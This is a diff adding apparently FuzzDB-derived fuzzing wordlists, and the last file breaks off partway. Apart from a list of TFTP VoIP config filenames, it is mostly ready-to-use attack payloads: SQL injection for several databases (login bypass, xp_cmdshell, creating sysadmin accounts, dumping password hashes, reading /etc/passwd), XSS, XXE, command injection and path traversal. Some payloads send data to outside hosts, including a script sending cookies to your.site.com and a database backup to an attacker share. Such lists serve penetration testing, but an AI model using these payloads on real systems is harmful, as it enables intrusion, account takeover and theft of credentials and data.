@@ -0,0 +1,79 @@
+# files commonly transmitted via tftp
+000000000000.cfg
+000000000000-directory~.xml
+323tosip1_1.bin
+4601_02_readme_R2_3.txt
+4601dbte1_82.bin
+4602_02SWSIPreadme_R1_1.txt
+4602dbte1_82.bin
+4602sbte1_82.bin
+4610_20_readme_R2_3.txt
+4610_20_readme_SIP_R2_2.txt
+4624_12_06readme_1_8_3.txt
+4625_readme_2_5.txt
+4690_010707.bin
+4690_readme_1_7_7.txt
+46xxreadme_111405.txt
+46xxsettings.txt
+46xxupgrade.scr
+a01d01b2_3.bin
+a02d01b2_3.bin
+a10d01b2_3.bin
+a20d01a2_3.bin
+a20d01b2_3.bin
+a25d01a2_5.bin
+b01d01b2_3.bin
+b02d01b2_3.bin
+b10d01b2_3.bin
+b20d01a2_3.bin
+b20d01b2_3.bin
+b25d01a2_5.bin
+bbla0_83.bin
+bootrom.ld
+cisco_util
+CP7912010301SIP050608A.sbin
+cvt01_2_3.bin
+cvt02_2_3.bin
+cvt02sw_2_3.bin
+def06r1_8_3.bin
+def24r1_8_3.bin
+dialplan.xml
+gkdefault.cfg
+infrared.txt
+merlin2.pcm
+OS79XX.TXT
+P003-07-5-00.bin
+P003-07-5-00.sbn
+P0S3-07-5-00.bin
+P0S3-07-5-00.loads
+P0S3-07-5-00.sb2
+phbook00e011010455.txt
+phone1.cfg
+release.xml
+RINGLIST.DAT
+s10d01b2_2.bin
+s20d01b2_2.bin
+SEP000F34118045.cnf
+SEP001562EA69E8.cnf
+SEPDefault.cnf
+SIP000F34118045.cnf
+SIPinsertMAChere.cnf
+SIPinsertMAChere.cnf
+sip_4602ap1_1.ebin
+sip_4602bt1_1.ebin
+sip_4602D01A.txt
+sip_4602D02A.txt
+sip.cfg
+SIPDefault.cnf
+sip.ld
+sipto323_1_1.ebin
+sip.ver
+SoundPointIPLocalization
+SoundPointIPWelcome.wav
+syncinfo.xml
+test
+test.txt
+uip200_463enc.pac
+uniden00e011030397.txt
+unidencom.txt
+XMLDefault.cnf.xml

Fuzzing/FUZZDB_DB2Enumeration.txt

@@ -0,0 +1,12 @@
+select versionnumber, version_timestamp from sysibm.sysversions;
+select user from sysibm.sysdummy1;
+select session_user from sysibm.sysdummy1;
+select system_user from sysibm.sysdummy1;
+select current server from sysibm.sysdummy1;
+select name from sysibm.systables;
+select grantee from syscat.dbauth;
+select * from syscat.tabauth;
+select * from syscat.dbauth where grantee = current user;
+select * from syscat.tabauth where grantee = current user;
+select name, tbname, coltype from sysibm.syscolumns;
+SELECT schemaname FROM syscat.schemata;

Fuzzing/FUZZDB_GenericBlind.txt

@@ -0,0 +1,42 @@
+# from wapiti
+sleep(__TIME__)#
+1 or sleep(__TIME__)#
+" or sleep(__TIME__)#
+' or sleep(__TIME__)#
+" or sleep(__TIME__)="
+' or sleep(__TIME__)='
+1) or sleep(__TIME__)#
+") or sleep(__TIME__)="
+') or sleep(__TIME__)='
+1)) or sleep(__TIME__)#
+")) or sleep(__TIME__)="
+')) or sleep(__TIME__)='
+;waitfor delay '0:0:__TIME__'--
+);waitfor delay '0:0:__TIME__'--
+';waitfor delay '0:0:__TIME__'--
+";waitfor delay '0:0:__TIME__'--
+');waitfor delay '0:0:__TIME__'--
+");waitfor delay '0:0:__TIME__'--
+));waitfor delay '0:0:__TIME__'--
+'));waitfor delay '0:0:__TIME__'--
+"));waitfor delay '0:0:__TIME__'--
+benchmark(10000000,MD5(1))#
+1 or benchmark(10000000,MD5(1))#
+" or benchmark(10000000,MD5(1))#
+' or benchmark(10000000,MD5(1))#
+1) or benchmark(10000000,MD5(1))#
+") or benchmark(10000000,MD5(1))#
+') or benchmark(10000000,MD5(1))#
+1)) or benchmark(10000000,MD5(1))#
+")) or benchmark(10000000,MD5(1))#
+')) or benchmark(10000000,MD5(1))#
+pg_sleep(__TIME__)--
+1 or pg_sleep(__TIME__)--
+" or pg_sleep(__TIME__)--
+' or pg_sleep(__TIME__)--
+1) or pg_sleep(__TIME__)--
+") or pg_sleep(__TIME__)--
+') or pg_sleep(__TIME__)--
+1)) or pg_sleep(__TIME__)--
+")) or pg_sleep(__TIME__)--
+')) or pg_sleep(__TIME__)--

Fuzzing/FUZZDB_MSSQL.txt

@@ -0,0 +1,17 @@
+# you will need to customize/modify some of the vaules in the queries for best effect
+'; exec master..xp_cmdshell 'ping 10.10.1.2'--
+'create user name identified by 'pass123' --
+'create user name identified by pass123 temporary tablespace temp default tablespace users; 
+' ; drop table temp --
+'exec sp_addlogin 'name' , 'password' --
+' exec sp_addsrvrolemember 'name' , 'sysadmin' --
+' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) --
+' grant connect to name; grant resource to name; --
+' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)
+' or 1=1 --
+' union (select @@version) --
+' union (select NULL, (select @@version)) --
+' union (select NULL, NULL, (select @@version)) --
+' union (select NULL, NULL, NULL,  (select @@version)) --
+' union (select NULL, NULL, NULL, NULL,  (select @@version)) --
+' union (select NULL, NULL, NULL, NULL,  NULL, (select @@version)) --

Fuzzing/FUZZDB_MSSQLEnumeration.txt

@@ -0,0 +1,15 @@
+# ms-sqli info disclosure payload fuzzfile
+# replace regex with your fuzzer for best results <attackerip> <sharename>
+# run wireshark or tcpdump, look for incoming smb or icmp packets from victim
+# might need to terminate payloads with ;--
+select @@version
+select @@servernamee
+select @@microsoftversione
+select * from master..sysserverse
+select * from sysusers
+exec master..xp_cmdshell 'ipconfig+/all'	
+exec master..xp_cmdshell 'net+view'
+exec master..xp_cmdshell 'net+users'
+exec master..xp_cmdshell 'ping+<attackerip>'
+BACKUP database master to disks='\\<attackerip>\<attackerip>\backupdb.dat'
+create table myfile (line varchar(8000))" bulk insert foo from 'c:\inetpub\wwwroot\auth.aspâ'" select * from myfile"--

Fuzzing/FUZZDB_MYSQL.txt

@@ -0,0 +1,6 @@
+1'1
+1 exec sp_ (or exec xp_)
+1 and 1=1
+1' and 1=(select count(*) from tablenames); --
+1 or 1=1
+1' or '1'='1

Fuzzing/FUZZDB_Metacharacters.txt

@@ -0,0 +1,118 @@
+!'
+!@#$%%^#$%#$@#$%$$@#$%^^**(()
+!@#0%^#0##018387@#0^^**(()
+"><script>"
+">xxx<P>yyy
+"\t"
+#
+#&apos;
+#'
+#xA
+#xA#xD
+#xD
+#xD#xA
+$NULL
+$null
+%
+%00
+%00/
+%01%02%03%04%0a%0d%0aADSF
+%0a
+%20
+%20|
+%2500
+%250a
+%2A
+%2C
+%2e%2e%2f
+%3C%3F
+%5C
+%5C/
+%60
+%7C
+&#10;
+&#10;&#13;
+&#13;
+&#13;&#10;
+&apos;
+&quot;;id&quot;
+(')
+*
+*&apos;
+*'
+*|
++%00
+-
+--
+-1
+-1.0
+-2
+-20
+-268435455
+..%%35%63
+..%%35c
+..%25%35%63
+..%255c
+..%5c
+..%bg%qf
+..%c0%af
+..%u2215
+..%u2216
+../
+..\
+/
+/%00/
+/%2A
+/&apos;
+/'
+0
+00
+0xfffffff
+1
+1.0
+2
+2147483647
+268435455
+65536
+;
+<  script > < / script>
+<?
+?x=
+?x="
+?x=>
+?x=|
+@&apos;
+@'
+A
+ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|
+FALSE
+NULL
+TRUE
+[&apos;]
+[']
+\
+\"blah
+\&apos;
+\'
+\0
+\00
+\00\00
+\00\00\00
+\0\0
+\0\0\0
+\\
+\\/
+\\\\*
+\\\\?\\
+\t
+^&apos;
+^'
+`
+id%00
+id%00|
+null
+something%00html
+{&apos;}
+{'}
+|
+}

Fuzzing/FUZZDB_MySQL_ReadLocalFiles.txt

@@ -0,0 +1,3 @@
+# mysql local file disclosure through sqli
+# fuzz interesting absolute filepath/filename into <filepath>
+create table myfile (input TEXT); load data infile '<filepath>' into table myfile; select * from myfile;

Fuzzing/FUZZDB_MySQL_SQLi_LoginBypass.txt

@@ -0,0 +1,8 @@
+# regex replace as many as you can with your fuzzer for best results:
+# <user-fieldname> <pass-fieldname> <username> 
+# also try to brute force a list of possible usernames, including possile admin acct names
+<username>' OR 1=1--
+'OR '' = '	Allows authentication without a valid username.
+<username>'--
+' union select 1, '<user-fieldname>', '<pass-fieldname>' 1--
+'OR 1=1--

Fuzzing/FUZZDB_Oracle.txt

@@ -0,0 +1,56 @@
+# contains statements from jbrofuzz
+’ or ‘1’=’1
+' or '1'='1
+'||utl_http.request('httP://192.168.1.1/')||'
+' || myappadmin.adduser('admin', 'newpass') || '
+' AND 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE ROWNUM=1)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT SYS.LOGIN_USER FROM DUAL)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT SYS.DATABASE_NAME FROM DUAL)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT host_name FROM v$instance)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT global_name FROM global_name)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(table_name)) FROM sys.all_tables)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(column_name)) FROM sys.all_tab_columns)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE=SYS.LOGIN_USER)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=1)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=1)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=1)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=1)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=2)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=2)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=2)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=2)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=2)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=3)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=3)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=3)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=3)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=3)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=4)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=4)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=4)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=4)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=4)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=5)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=5)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=5)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=5)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=5)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=6)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=6)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=6)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=6)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=6)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=7)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=7)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=7)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=7)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=7)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=8)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=8)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=8)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=8)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=8)) AND 'i'='i
+

Fuzzing/FUZZDB_PostgresEnumeration.txt

@@ -0,0 +1,20 @@
+# info disclosure payload fuzzfile for pgsql
+select version();	
+select current_database();
+select current_user;
+select session_user;
+select current_setting('log_connections');
+select current_setting('log_statement');
+select current_setting('port');
+select current_setting('password_encryption');
+select current_setting('krb_server_keyfile');
+select current_setting('virtual_host');
+select current_setting('port');
+select current_setting('config_file');
+select current_setting('hba_file');
+select current_setting('data_directory');
+select * from pg_shadow;
+select * from pg_group;
+create table myfile (input TEXT);
+copy myfile from '/etc/passwd'; 
+select * from myfile;copy myfile to /tmp/test;

Fuzzing/FUZZDB_URIXSS.txt

@@ -0,0 +1,6 @@
+# Contains statements from jbrofuzz (13 April 2010)
+aim: &c:\windows\system32\calc.exe" ini="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\pwnd.bat"
+firefoxurl:test|"%20-new-window%20javascript:alert(\'Cross%2520Browser%2520Scripting!\');"
+navigatorurl:test" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C[\'@mozilla.org/file/local;1\'].createInstance(I.nsILocalFile);file.initWithPath(\'C:\'+String.fromCharCode(92)+String.fromCharCode(92)+\'Windows\'+String.fromCharCode(92)+String.fromCharCode(92)+\'System32\'+String.fromCharCode(92)+String.fromCharCode(92)+\'cmd.exe\');process=C[\'@mozilla.org/process/util;1\'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process)
+res://c:\\program%20files\\adobe\\acrobat%207.0\\acrobat\\acrobat.dll/#2/#210
+

Fuzzing/FUZZDB_UnixAttacks.txt

@@ -0,0 +1,512 @@
+# a wide sample of malicious input for unix-like targets
+!
+!'
+!@#$%%^#$%#$@#$%$$@#$%^^**(()
+!@#0%^#0##018387@#0^^**(()
+"
+" or "a"="a
+" or "x"="x
+" or 0=0 #
+" or 0=0 --
+" or 1=1 or ""="
+" or 1=1--
+"' or 1 --'"
+") or ("a"="a
+"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////dev/random"">]><foo>&xxe;</foo>"
+"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////etc/passwd"">]><foo>&xxe;</foo>"
+"<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><![CDATA[' or 1=1 or ''=']]></foo>"
+"<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>"
+"<HTML xmlns:xss><?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""><xss:xss>XSS</xss:xss></HTML>"
+"<xml ID=""xss""><I><B><IMG SRC=""javas<!-- -->cript:alert('XSS')""></B></I></xml><SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
+"<xml ID=I><X><C><![CDATA[<IMG SRC=""javas]]><![CDATA[cript:alert('XSS');"">]]>"
+"><script>"
+"><script>alert(1)</script>
+"><script>document.location='http://your.site.com/cgi-bin/cookie.cgi?'+document.cookie</script>
+">xxx<P>yyy
+"\t"
+#
+#&apos;
+#'
+#xA
+#xA#xD
+#xD
+#xD#xA
+$NULL
+$null
+%
+%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%
+%00
+%00../../../../../../etc/passwd
+%00../../../../../../etc/shadow
+%00/
+%00/etc/passwd%00
+%01%02%03%04%0a%0d%0aADSF
+%08x
+%0A/usr/bin/id
+%0A/usr/bin/id%0A
+%0Aid
+%0Aid%0A
+%0a ping -i 30 127.0.0.1 %0a
+%oa ping -n 30 127.0.0.1 %0a
+%0a id %0a
+%0aDATA%0afoo%0a%2e%0aMAIL+FROM:+<youremail>%0aRCPT+TO:+<youremail>%0aDATA%0aFrom:+<youremail>%0aTo:+<youremail>%0aSubject:+tst%0afoo%0a%2e%0a
+%0d
+%0d%0aDATA%0d%0afoo%0d%0a%2e%0d%0aMAIL+FROM:+<youremail>%0d%0aRCPT+TO:+<youremail>%0d%0aDATA%0d%0aFrom:+<youremail>%0d%0aTo:+<youremail>%0d%0aSubject:+test%0d%0afoo%0d%0a%2e%0d%0a
+%0d%0aX-Injection-Header:%20AttackValue
+%20
+%20$(sleep%2050)
+%20'sleep%2050'
+%20d
+%20n
+%20s
+%20x
+%20|
+%21
+%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E
+%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%		25%5c..%25%5c..%255cboot.ini
+%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%	25%5c..%25%5c..%00
+%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
+%2500
+%250a
+%26
+%27%20or%201=1
+%28
+%29
+%2A
+%2A%28%7C%28mail%3D%2A%29%29
+%2A%28%7C%28objectclass%3D%2A%29%29
+%2A%7C
+%2C
+%2e%2e%2f
+%3C
+%3C%3F
+%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E
+%3cscript%3ealert("XSS");%3c/script%3e
+%3cscript%3ealert(document.cookie);%3c%2fscript%3e
+%5C
+%5C/
+%60
+%7C
+%7f
+%99999999999s
+%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A
+%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E
+%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F
+%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G
+%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X
+%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a
+%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d 
+%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e
+%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f
+%ff
+%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g
+%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i
+%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o
+%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p
+%s%p%x%d
+%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
+%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u
+%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
+&
+& id
+& ping -i 30 127.0.0.1 &
+& ping -n 30 127.0.0.1 &
+&#0000060
+&#0000060;
+&#000060
+&#000060;
+&#00060
+&#00060;
+&#0060
+&#0060;
+&#060
+&#060;
+&#10;
+&#10;&#13;
+&#13;
+&#13;&#10;
+&#60
+&#60;
+&#X000003C
+&#X000003C;
+&#X000003c
+&#X000003c;
+&#X00003C
+&#X00003C;
+&#X00003c
+&#X00003c;
+&#X0003C
+&#X0003C;
+&#X0003c
+&#X0003c;
+&#X003C
+&#X003C;
+&#X003c
+&#X003c;
+&#X03C
+&#X03C;
+&#X03c
+&#X03c;
+&#X3C
+&#X3C;
+&#X3c
+&#X3c;
+&#x000003C
+&#x000003C;
+&#x000003c
+&#x000003c;
+&#x00003C
+&#x00003C;
+&#x00003c
+&#x00003c;
+&#x0003C
+&#x0003C;
+&#x0003c
+&#x0003c;
+&#x003C
+&#x003C;
+&#x003c
+&#x003c;
+&#x03C
+&#x03C;
+&#x03c
+&#x03c;
+&#x3C
+&#x3C;
+&#x3c
+&#x3c;
+&LT
+&LT;
+&apos;
+&apos;%20OR
+&id
+&lt
+&lt;
+&lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/passwd&quot;--&gt;
+&lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/shadow&quot;--&gt;
+&lt;!--#exec%20cmd=&quot;/usr/bin/id;--&gt;
+&lt;&gt;&quot;'%;)(&amp;+
+&ltscript&gtalert(document.cookie);&ltscript&gtalert
+&ltscript&gtalert(document.cookie);</script>
+&quot;;id&quot;
+'
+' (select top 1
+' --
+' ;
+' UNION ALL SELECT
+' UNION SELECT
+' or ''='
+' or '1'='1
+' or '1'='1'--
+' or 'x'='x
+' or (EXISTS)
+' or 0=0 #
+' or 0=0 --
+' or 1 in (@@version)--
+' or 1=1 or ''='
+' or 1=1--
